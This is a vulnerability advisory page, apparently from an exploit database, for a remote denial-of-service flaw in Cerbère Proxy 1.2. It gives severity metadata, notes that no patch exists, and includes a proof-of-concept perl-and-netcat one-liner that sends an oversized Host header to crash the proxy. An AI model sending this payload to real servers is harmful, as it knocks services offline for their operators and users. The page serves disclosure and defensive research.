header-logo
Suggest Exploit
vendor:
Proxy Server
by:
Unknown
7.5
CVSS
HIGH
Remote Denial of Service
Unknown
CWE
Product Name: Proxy Server
Affected Version From: Cerbère Proxy 1.2
Affected Version To: Unknown
Patch Exists: NO
Related CWE: Unknown
CPE: a:cerbere:proxy:1.2
Metasploit:
Other Scripts:
Platforms Tested:
Unknown

Cerbère Proxy Server Remote Denial of Service Vulnerability

A remote attacker can send a malformed HTTP GET request to the server, causing a denial of service condition in the proxy, leading to a crash or hang.

Mitigation:

No known mitigation or remediation
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/11085/info

Cerbère Proxy server is reported prone to a remote denial of service vulnerability. This issue presents itself when a remote attacker sends a malformed HTTP GET request to the server.

A remote attacker may cause a denial of service condition in the proxy leading to a crash or hang.

Cerbère Proxy 1.2 is reported prone to this issue, however, other versions may be affected as well.

perl -e 'print "GET / HTTP/1.1\r\n" . "Host: " . "A" x 90000 . "\r\n" . "\r\n\r\n" ' | nc "Proxy_IP" 3128

Navigation

Suggest Exploit

Services By CQR